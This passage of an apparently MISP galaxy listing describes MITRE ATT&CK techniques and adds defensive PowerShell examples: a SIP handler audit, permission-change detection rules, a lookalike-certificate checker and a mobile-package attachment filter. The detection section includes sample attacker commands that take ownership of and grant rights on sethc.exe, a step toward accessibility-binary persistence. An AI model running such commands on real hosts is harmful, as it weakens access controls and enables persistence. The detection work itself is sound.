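    $fn  = [string]$props.$FnValue
    $reasons = @(); $resolved = ''; $sha256 = ''
    if (-not $dll) { $reasons += 'no DLL value' }
    else {
        $resolved = Resolve-HandlerPath -DllValue $dll -SysDir $SysDir
        if (-not (Test-Path -LiteralPath $resolved)) {
            $reasons += 'DLL not present at resolved path'
        } else {
            if (-not $resolved.StartsWith($SysDir, [StringComparison]::OrdinalIgnoreCase)) {
                $reasons += "DLL outside $SysDir"
            }
            $sha256 = (Get-FileHash -LiteralPath $resolved -Algorithm SHA256).Hash
            $sig = Get-AuthenticodeSignature -LiteralPath $resolved
            if ($sig.Status -ne 'Valid') {
                $reasons += "signature $($sig.Status)"
            } elseif ($sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
                $reasons += "signer $($sig.SignerCertificate.Subject)"
            }
        }
    }
    [pscustomobject]@{
        View = $View; Family = $Family; Guid = (Split-Path $KeyPath -Leaf)
        Dll = $dll; Function = $fn; Resolved = $resolved; SHA256 = $sha256
        Suspicious = ($reasons.Count -gt 0); Reasons = ($reasons -join '; ')
    }
}

$findings = foreach ($view in $Views) {
    foreach ($fam in $Families) {
        $root = Join-Path $view.Hive $fam.Path
        if (-not (Test-Path -LiteralPath $root)) { continue }
        foreach ($key in Get-ChildItem -LiteralPath $root) {
            Test-HandlerEntry -View $view.Name -Family ($fam.Path.Split('\')[-1]) `
                -KeyPath $key.PSPath -DllValue $fam.DllValue -FnValue $fam.FnValue -SysDir $view.SysDir
        }
    }
}

$findings | Sort-Object Suspicious -Descending |
    Format-Table View, Family, Guid, Dll, Function, Suspicious, Reasons -AutoSize
```

Two caveats matter when reading the output. First, `Get-AuthenticodeSignature` itself goes through WinVerifyTrust and therefore through the very SIP being audited: once the Portable Executable SIP is hijacked, the attacker's DLL will also report `Valid`, so the SHA256 column should be exported from a known-good build and diffed rather than trusted from a suspect host alone. Second, an entry redirected to a real exported function in a legitimately signed DLL (the "already present DLL" variant above) passes every signature test; only the `Dll`/`Function` pair and its hash, compared against that baseline, reveal it.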
Internal MISP references
UUID 72b5ef57-325c-411b-93ca-a3ca6fa17e31
which can be used as unique global reference for SIP and Trust Provider Hijacking - T1198
in MISP communities and other software using the MISP galaxy
External references
- http://www.entrust.net/knowledge-base/technote.cfm?tn=8165 - webarchive
- https://attack.mitre.org/techniques/T1198 - webarchive
- https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/ - webarchive
- https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10) - webarchive
- https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11) - webarchive
- https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files - webarchive
- https://github.com/mattifestation/PoCSubjectInterfacePackage - webarchive
- https://msdn.microsoft.com/library/ms537359.aspx - webarchive
- https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx - webarchive
- https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1198 |
kill_chain | ['attack-Windows:defense-evasion', 'attack-Windows:persistence'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
File and Directory Permissions Modification - T1222
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, Unix Shell Configuration Modification, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.
Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior)
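The data sources listed for this technique (command execution, process creation) suggest a command-line detection. The following is an added example, not MITRE's code: a small rule set run over constructed process-creation records that covers the `icacls`/`takeown`/`cacls`/`attrib` changes, the `fsutil behavior set SymlinkEvaluation` setting cited above, and the Unix `chmod`/`chattr` equivalents, with a higher severity when the target is one of the Accessibility Features binaries the text names as a persistence path. The record shape (Time, User, Image, CommandLine), the rule patterns and the sample records are all assumptions of this example.

```powershell
# Added example (not MITRE code): flag process-creation command lines that change
# permissions, ownership, attributes or symlink evaluation as T1222 describes.
# Input shape is an assumption: what you would project from Security event 4688
# or Sysmon event 1. The sample records below are constructed for this example.

# Accessibility binaries whose ACLs are changed on the way to persistence.
$AccessibilityBinaries = '(?i)\\System32\\(sethc|utilman|osk|narrator|magnify|displayswitch|atbroker)\.exe'

$Rules = @(
    @{ Name    = 'icacls grants a broad principal'
       Pattern = '(?i)\bicacls(\.exe)?\b.*/grant(:r)?\s+\S*(everyone|authenticated users|builtin\\users|\*S-1-1-0|\*S-1-5-11|\*S-1-5-32-545)' }
    @{ Name    = 'icacls strips inheritance, resets ACL or sets owner'
       Pattern = '(?i)\bicacls(\.exe)?\b.*(/inheritance:[rd]|/reset|/setowner)' }
    @{ Name    = 'takeown seizes ownership'
       Pattern = '(?i)\btakeown(\.exe)?\b.*/f\b' }
    @{ Name    = 'cacls grants or replaces access'
       Pattern = '(?i)\bcacls(\.exe)?\b.*/[gp]\b' }
    @{ Name    = 'ACL or ownership change on an accessibility binary'
       Pattern = '(?i)\b(icacls|cacls|takeown|attrib)(\.exe)?\b.*\\System32\\(sethc|utilman|osk|narrator|magnify|displayswitch|atbroker)\.exe' }
    @{ Name    = 'fsutil enables remote-to-local symlink evaluation'
       Pattern = '(?i)\bfsutil(\.exe)?\s+behavior\s+set\s+SymlinkEvaluation\b.*\b(R2L|R2R):1' }
    @{ Name    = 'attrib hides file or marks it system'
       Pattern = '(?i)\battrib(\.exe)?\b.*\+[hs]' }
    @{ Name    = 'chmod world-writable or chattr immutable'
       Pattern = '(?i)\b(chmod\s+(-R\s+)?(777|[ao]\+w)|chattr\s+(-R\s+)?[+-]i)\b' }
)

function Find-PermissionModification {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)] [object]$Record)
    process {
        foreach ($rule in $Rules) {
            if ($Record.CommandLine -match $rule.Pattern) {
                $severity = if ($Record.CommandLine -match $AccessibilityBinaries) { 'high' } else { 'medium' }
                [pscustomobject]@{
                    Time = $Record.Time; User = $Record.User; Rule = $rule.Name
                    Severity = $severity; CommandLine = $Record.CommandLine
                }
            }
        }
    }
}

# Constructed sample records (not real telemetry).
$SampleRecords = @(
    [pscustomobject]@{ Time = '2024-03-01T09:12:44Z'; User = 'CORP\svc-backup'; Image = 'C:\Windows\System32\icacls.exe';  CommandLine = 'icacls "C:\ProgramData\Vendor\config.xml" /grant Everyone:F' }
    [pscustomobject]@{ Time = '2024-03-01T09:13:02Z'; User = 'CORP\svc-backup'; Image = 'C:\Windows\System32\takeown.exe'; CommandLine = 'takeown /f C:\Windows\System32\sethc.exe /a' }
    [pscustomobject]@{ Time = '2024-03-01T09:13:05Z'; User = 'CORP\svc-backup'; Image = 'C:\Windows\System32\icacls.exe';  CommandLine = 'icacls C:\Windows\System32\sethc.exe /grant Administrators:F' }
    [pscustomobject]@{ Time = '2024-03-01T09:20:00Z'; User = 'CORP\svc-backup'; Image = 'C:\Windows\System32\fsutil.exe';  CommandLine = 'fsutil behavior set SymlinkEvaluation R2L:1' }
    [pscustomobject]@{ Time = '2024-03-01T10:01:10Z'; User = 'CORP\alice';      Image = 'C:\Windows\System32\icacls.exe';  CommandLine = 'icacls C:\Users\alice\Documents /grant alice:(OI)(CI)M' }
    [pscustomobject]@{ Time = '2024-03-01T10:05:00Z'; User = 'CORP\alice';      Image = 'C:\Windows\System32\notepad.exe'; CommandLine = 'notepad.exe C:\Users\alice\notes.txt' }
)

$SampleRecords | Find-PermissionModification | Format-Table Time, User, Severity, Rule, CommandLine -AutoSize
```

With the constructed records, the first four fire (the `takeown` on `sethc.exe` hits two rules and is rated high) and the last two, a user granting rights on her own folder and an unrelated process, are silent. One record can match several rules; that is intended, since the combination of ownership seizure and a grant on the same system binary is stronger evidence than either alone.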
Internal MISP references
UUID 65917ae0-b854-4139-83fe-bf2441cf0196
which can be used as unique global reference for File and Directory Permissions Modification - T1222
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1222 - webarchive
- https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html - webarchive
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior - webarchive
- https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware - webarchive
- https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/ - webarchive
- https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/ - webarchive
- https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 - webarchive
- https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1222 |
kill_chain | ['attack-Linux:defense-evasion', 'attack-Windows:defense-evasion', 'attack-macOS:defense-evasion'] |
mitre_data_sources | ['Active Directory: Active Directory Object Modification', 'Command: Command Execution', 'File: File Metadata', 'Process: Process Creation'] |
mitre_platforms | ['Linux', 'Windows', 'macOS'] |
Assess leadership areas of interest - T1224
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Leadership assesses the areas of most interest to them and generates Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ). For example, an adversary knows from open and closed source reporting that cyber is of interest, resulting in it being a KIT. (Citation: ODNIIntegration)
Internal MISP references
UUID d3999268-740f-467e-a075-c82e2d04be62
which can be used as unique global reference for Assess leadership areas of interest - T1224
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1224 |
kill_chain | ['pre-attack:priority-definition-planning'] |
Determine 3rd party infrastructure services - T1284
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available as 3rd party infrastructure services. These services could provide an adversary with another avenue of approach or compromise. (Citation: LUCKYCAT2012) (Citation: Schneier-cloud) (Citation: Computerworld-suppliers)
Internal MISP references
UUID dfa4eaf4-50d9-49de-89e9-d33f579f3e05
which can be used as unique global reference for Determine 3rd party infrastructure services - T1284
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1284 |
kill_chain | ['pre-attack:organizational-information-gathering'] |
Related clusters
To see the related clusters, click here.
Determine highest level tactical element - T1243
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
From a tactical viewpoint, an adversary could potentially have a primary and secondary level target. The primary target represents the highest level tactical element the adversary wishes to attack. For example, the corporate network within a corporation or the division within an agency. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)
Internal MISP references
UUID dc7dfc9f-be1b-4e6e-a2e6-9a9bb2400ec9
which can be used as unique global reference for Determine highest level tactical element - T1243
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1243 |
kill_chain | ['pre-attack:target-selection'] |
Determine secondary level tactical element - T1244
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
The secondary level tactical element the adversary seeks to attack is the specific network or area of a network that is vulnerable to attack. Within the corporate network example, the secondary level tactical element might be a SQL server or a domain controller with a known vulnerability. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)
Internal MISP references
UUID b9148981-152a-4a19-95c1-962803f5c9af
which can be used as unique global reference for Determine secondary level tactical element - T1244
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1244 |
kill_chain | ['pre-attack:target-selection'] |
Attack PC via USB Connection - T1427
With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC.(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.
Internal MISP references
UUID a0464539-e1b7-4455-a355-12495987c300
which can be used as unique global reference for Attack PC via USB Connection - T1427
in MISP communities and other software using the MISP galaxy
External references
- http://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-password-protected-computers/ - webarchive
- http://dl.acm.org/citation.cfm?id=1920314 - webarchive
- https://attack.mitre.org/techniques/T1427 - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1427 |
kill_chain | ['mobile-attack-Android:lateral-movement'] |
mitre_platforms | ['Android'] |
Determine centralization of IT management - T1285
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Determining if a "corporate" help desk exists, the degree of access and control it has, and whether there are "edge" units that may have different support processes and standards. (Citation: SANSCentratlizeManagement)
Internal MISP references
UUID a7dff5d5-99f9-4a7e-ac54-a64113c28121
which can be used as unique global reference for Determine centralization of IT management - T1285
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1285 |
kill_chain | ['pre-attack:organizational-information-gathering'] |
Determine external network trust dependencies - T1259
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Network trusts enable communications between different networks with specific accesses and permissions. Network trusts could include the implementation of domain trusts or the use of virtual private networks (VPNs). (Citation: CuckoosEgg) (Citation: CuckoosEggWikipedia) (Citation: KGBComputerMe)
Internal MISP references
UUID a2fc93cd-e371-4755-9305-2615b6753d91
which can be used as unique global reference for Determine external network trust dependencies - T1259
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1259 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Analyze organizational skillsets and deficiencies - T1297
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Understanding organizational skillsets and deficiencies could provide insight into weaknesses in defenses, or opportunities for exploitation. (Citation: FakeLinkedIn)
Internal MISP references
UUID 96eb59d1-6c46-44bb-bfcd-56be02a00d41
which can be used as unique global reference for Analyze organizational skillsets and deficiencies - T1297
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1297 |
kill_chain | ['pre-attack:people-weakness-identification'] |
Related clusters
To see the related clusters, click here.
Analyze architecture and configuration posture - T1288
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An adversary may analyze technical scanning results to identify weaknesses in the configuration or architecture of a victim network. These weaknesses could include architectural flaws, misconfigurations, or improper security controls. (Citation: FireEyeAPT28)
Internal MISP references
UUID 87775365-2081-4b6e-99bd-48a3b8f36563
which can be used as unique global reference for Analyze architecture and configuration posture - T1288
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1288 |
kill_chain | ['pre-attack:technical-weakness-identification'] |
Analyze organizational skillsets and deficiencies - T1289
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)
Internal MISP references
UUID 092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc
which can be used as unique global reference for Analyze organizational skillsets and deficiencies - T1289
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1289 |
kill_chain | ['pre-attack:technical-weakness-identification'] |
Related clusters
To see the related clusters, click here.
Leverage compromised 3rd party resources - T1375
This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.
The utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). (Citation: CitizenLabGreatCannon)
Internal MISP references
UUID 2c8a9df4-52a9-4770-94b3-5e95ab7d59f9
which can be used as unique global reference for Leverage compromised 3rd party resources - T1375
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1375 |
kill_chain | ['pre-attack:launch'] |
Procure required equipment and software - T1335
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)
Internal MISP references
UUID 2141aea0-cf38-49aa-9e51-ac34092bc30a
which can be used as unique global reference for Procure required equipment and software - T1335
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1335 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
SSL certificate acquisition for domain - T1337
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Acquiring a certificate for a domain name similar to one that is expected to be trusted may allow an adversary to trick a user into trusting the domain (e.g., vvachovia instead of Wachovia -- homoglyphs). (Citation: SubvertSSL) (Citation: PaypalScam)
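Because every publicly trusted certificate is logged, the defender's counterpart to this technique is watching certificate subject names for lookalikes of their own brand. The following is an added example, not MITRE's code: it undoes a small table of confusable substitutions (vv for w, rn for m, 0 for o, a few Cyrillic letters, and so on) to reduce each registrable label to a skeleton, decodes punycode so IDN homoglyphs are compared as Unicode, and flags subjects whose skeleton equals or contains the brand's. The confusable table is a hand-picked assumption, not a standard, and the certificate subjects are constructed stand-ins for what a Certificate Transparency feed would return.

```powershell
# Added example (not MITRE code): find certificate subjects that look like a
# brand once common confusable substitutions are undone. The substitution table
# is a small assumption, not a standard; sample subjects are constructed.

# Ordered so multi-character confusables collapse before single characters.
$Confusables = [ordered]@{
    'vv' = 'w'; 'rn' = 'm'; 'cl' = 'd'
    '0' = 'o'; '1' = 'l'; 'i' = 'l'; '5' = 's'; '3' = 'e'
    'а' = 'a'; 'о' = 'o'; 'е' = 'e'; 'с' = 'c'   # Cyrillic a, o, e, c
}

function Get-Skeleton {
    param([string]$Label)
    $s = $Label.ToLowerInvariant()
    foreach ($k in $Confusables.Keys) { $s = $s.Replace($k, $Confusables[$k]) }
    return $s
}

function Get-RegistrableLabel {
    param([string]$Name)
    # Drop a wildcard, decode xn-- labels to Unicode, take the label left of the
    # TLD. Assumption: single-label public suffixes only (co.uk is not handled).
    $hostName = $Name.TrimStart('*').TrimStart('.').ToLowerInvariant()
    $idn = New-Object System.Globalization.IdnMapping
    try { $hostName = $idn.GetUnicode($hostName) } catch { }
    $labels = $hostName.Split('.')
    if ($labels.Count -lt 2) { return $hostName }
    return $labels[$labels.Count - 2]
}

function Find-LookalikeSubject {
    param([string]$Brand, [string[]]$Subjects)
    $brandLabel = Get-RegistrableLabel $Brand
    $target = Get-Skeleton $brandLabel
    foreach ($subject in $Subjects) {
        $label = Get-RegistrableLabel $subject
        if ($label -eq $brandLabel) { continue }       # the brand's own certificates
        $skeleton = Get-Skeleton $label
        $match = if ($skeleton -eq $target) { 'confusable' }
                 elseif ($skeleton.Contains($target)) { 'brand-with-affix' }
                 else { $null }
        if ($match) {
            [pscustomobject]@{ Subject = $subject; Label = $label; Skeleton = $skeleton; Match = $match }
        }
    }
}

# Constructed sample subjects; the last lookalike is issued in punycode form,
# which is how a CT log would show a Cyrillic-a homoglyph.
$idn = New-Object System.Globalization.IdnMapping
$SampleSubjects = @(
    'www.wachovia.com'
    'vvachovia.com'
    'wach0via-login.net'
    '*.wachovla.com'
    $idn.GetAscii('wаchovia.com')
    'example.org'
)

Find-LookalikeSubject -Brand 'wachovia.com' -Subjects $SampleSubjects | Format-Table -AutoSize
```

Four of the six constructed subjects are reported and the brand's own certificate and `example.org` are not. Mapping `i` to `l` makes the skeleton lossy on purpose: both the brand and the lookalike are reduced the same way, so what matters is that equal skeletons mean visually confusable labels, not that the skeleton is readable.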
Internal MISP references
UUID e34b9ca1-8778-41a3-bba5-8edaab4076dc
which can be used as unique global reference for SSL certificate acquisition for domain - T1337
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1337 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Confirmation of launched compromise achieved - T1383
This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.
Upon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)
Internal MISP references
UUID f4c5d1d9-8f0e-46f1-a9fa-f9a440926046
which can be used as unique global reference for Confirmation of launched compromise achieved - T1383
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1383 |
kill_chain | ['pre-attack:compromise'] |
App Delivered via Email Attachment - T1434
The application is delivered as an email attachment.
Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices. Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.
Platforms: Android, iOS
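The detection note above says that mail security tooling can recognise Android or iOS packages inside messages; the reliable way to do that is by content, since an attacker controls the attachment's extension. The following is an added example, not MITRE's code: both APK and IPA are ZIP containers, so it checks the ZIP magic, opens the bytes as an archive and looks for the layout markers of each format (`AndroidManifest.xml` plus a `classes*.dex` for APK, a `Payload/<name>.app/` tree for IPA). The sample attachments are built in memory and are constructed for this example; the file names, including the APK disguised as a PDF, are assumptions.

```powershell
# Added example (not MITRE code): classify mail attachments by content. APK and
# IPA packages are ZIP archives with a recognisable layout, so the extension
# is ignored. Sample attachments below are constructed in memory.
Add-Type -AssemblyName System.IO.Compression

function New-ZipBytes {
    param([string[]]$EntryNames)
    # Minimal archive with the given entry names, one placeholder byte each.
    $ms  = New-Object System.IO.MemoryStream
    $zip = New-Object System.IO.Compression.ZipArchive($ms, [System.IO.Compression.ZipArchiveMode]::Create, $true)
    foreach ($name in $EntryNames) {
        $stream = $zip.CreateEntry($name).Open()
        $stream.WriteByte(0)
        $stream.Dispose()
    }
    $zip.Dispose()
    $bytes = $ms.ToArray()
    $ms.Dispose()
    return ,$bytes
}

function Get-MobilePackageType {
    param([byte[]]$Bytes)
    # ZIP local file header magic "PK\x03\x04".
    if ($Bytes.Length -lt 4 -or $Bytes[0] -ne 0x50 -or $Bytes[1] -ne 0x4B -or
        $Bytes[2] -ne 0x03 -or $Bytes[3] -ne 0x04) { return 'not-zip' }
    $ms = New-Object System.IO.MemoryStream(,$Bytes)
    try {
        $zip = New-Object System.IO.Compression.ZipArchive($ms, [System.IO.Compression.ZipArchiveMode]::Read)
        $names = @($zip.Entries | ForEach-Object { $_.FullName })
        $zip.Dispose()
    } catch {
        return 'corrupt-zip'          # truncated or malformed central directory
    } finally {
        $ms.Dispose()
    }
    if (($names -contains 'AndroidManifest.xml') -and ($names -match '^classes\d*\.dex$')) { return 'apk' }
    if ($names -match '^Payload/[^/]+\.app/') { return 'ipa' }
    return 'zip'
}

# Constructed sample attachments (not real mail).
$SampleAttachments = @(
    @{ Name = 'invoice.pdf'; Bytes = New-ZipBytes @('AndroidManifest.xml', 'classes.dex', 'META-INF/MANIFEST.MF') }   # APK, misleading extension
    @{ Name = 'Update.ipa';  Bytes = New-ZipBytes @('Payload/Update.app/Info.plist', 'Payload/Update.app/Update') }
    @{ Name = 'report.zip';  Bytes = New-ZipBytes @('report.docx') }
    @{ Name = 'readme.txt';  Bytes = [System.Text.Encoding]::ASCII.GetBytes('plain text, not an archive') }
)

foreach ($attachment in $SampleAttachments) {
    $type = Get-MobilePackageType -Bytes $attachment.Bytes
    $verdict = if (@('apk', 'ipa') -contains $type) { 'BLOCK' } else { 'allow' }
    '{0,-6} {1,-12} {2}' -f $verdict, $attachment.Name, $type
}
```

The first two constructed attachments are blocked as `apk` and `ipa`, the plain archive is allowed as `zip`, and the text file is `not-zip`. Nested archives (an APK inside a ZIP) and encrypted ZIPs, whose entry names are still readable, are the next two cases a production filter would need; the entry-name check already handles the latter because ZIP encrypts entry data, not the central directory.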
Internal MISP references
UUID 1f96d624-8409-4472-ad8a-30618ee6b2e2
which can be used as unique global reference for App Delivered via Email Attachment - T1434
in MISP communities and other so